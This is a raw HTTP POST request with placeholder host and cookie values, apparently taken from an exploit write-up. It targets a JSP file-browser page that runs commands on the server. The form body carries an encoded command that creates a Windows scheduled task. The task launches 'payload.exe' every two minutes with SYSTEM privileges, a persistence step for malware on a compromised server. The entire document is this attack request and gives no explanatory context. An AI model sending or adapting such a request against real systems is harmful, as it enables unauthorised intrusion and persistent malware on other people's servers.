POST http://hostx:portx/browserwin/browser/Browser.jsp HTTP/1.1
Host: hostx:portx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://hostx:portx/browserwin/browser/Browser.jsp
Cookie: cookiex 
Content-Type: application/x-www-form-urlencoded
Content-Length: 166

text=%0D%0A&dir=C%3A%5C&command=schtasks+%2Fcreate+%2Ftn+sqlhost+%2Ftr+c%3A%5Cwindows%5Csystem32%5Cpayload.exe++%2Fsc+minute+%2Fmo+2+%2Fru+system&Submit=Launch&sort=1
